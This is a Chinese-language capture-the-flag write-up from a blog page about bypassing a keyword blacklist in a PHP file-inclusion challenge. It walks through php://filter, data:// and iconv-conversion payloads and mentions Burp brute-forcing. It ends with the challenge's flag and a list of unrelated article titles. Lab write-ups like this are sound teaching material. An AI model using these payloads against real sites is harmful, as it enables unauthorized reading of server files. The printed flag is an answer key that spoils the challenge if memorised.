当前位置: 首页 > backend >正文

攻防世界-题目名称-文件包含

进入环境

看到 include(),想到文件包含,用php伪协议

/?filename=php://filter/read=convert.base64-encode/resource=flag.php

do not hack!猜测可能是黑名单检测的敏感字符

输入单个字符串/?filename=base64

还是显示do not hack!

构造payload

/?filename=convert

可以推测base64在黑名单里面,还有string、read

构造payload

/?filename=data://text/plain,1234567

发现没有成功,成功应该返回1234567

考虑php://filter有没有过滤器可以用

把flag.php的内容从UCS-2LE.UCS转为UCS-2BE编码

构造payload

/?filename=php://filter?convert.iconv.UCS-2LE.UCS-2BE/resource=flag.php

还是不行,还有很多字符可以尝试,但是太耗时间了,直接burp里面尝试爆破

开始攻击,在结果里面找flag

或者直接设置payload

cyberpeace{090804bb1d2cca98136f9b1da4d40d01}

http://www.xdnf.cn/news/7671.html

相关文章:

  • MySQL 库的操作 -- 字符集和校验规则,库的增删查改,数据库的备份和还原
  • Java IO流操作
  • Prosys OPC:引领工业互联的OPC UA先锋
  • 游戏引擎学习第296天:层的雾效和透明度
  • 基于Spring Boot + Vue的教师工作量管理系统设计与实现
  • 监控易一体化运维:解锁工单管理效能,为运维工作提速
  • ZooKeeper 原理解析及优劣比较
  • 安达发|传统排产已过时?AI机器人+APS高级排产软件重塑制造业!
  • docker 查看镜像所在位置
  • Index-AniSora论文速读:探索Sora时代动画视频生成的前沿
  • Qt中解决Tcp粘包问题
  • Runtipi - 开源个人家庭服务器管理工具
  • C#调用GTS控制板
  • DeepSeek+PiscTrace+YOLO:迅速实现Mask掩码抠图
  • IEEE 802.1Q协议下封装的VLAN数据帧格式
  • 【ISP算法精粹】什么是global tone mapping和local tone mapping?
  • 异步复位,同步释放
  • FineBI 和 Axure工具比较——数据分析VS原型设计
  • 常见回归损失函数详解:L1 Loss, L2 Loss, Huber Loss
  • 能碳一体化的核心功能模块
  • 【图像大模型】Kolors:基于自监督学习的通用视觉色彩增强系统深度解析
  • 抓包分析工具与流量监控软件
  • C语言入门
  • SQLite基础及优化
  • 从0到1搭建shopee测评自养号系统:独立IP+硬件伪装+养号周期管理​
  • [概率论基本概念1]什么是经验分布
  • 【NLP 76、Faiss 向量数据库】
  • Easylogging使用笔记
  • 【开源】一个基于 Vue3 和 Electron 开发的第三方网易云音乐客户端,具有与官方客户端相似的界面布局
  • pom.xml中的runtime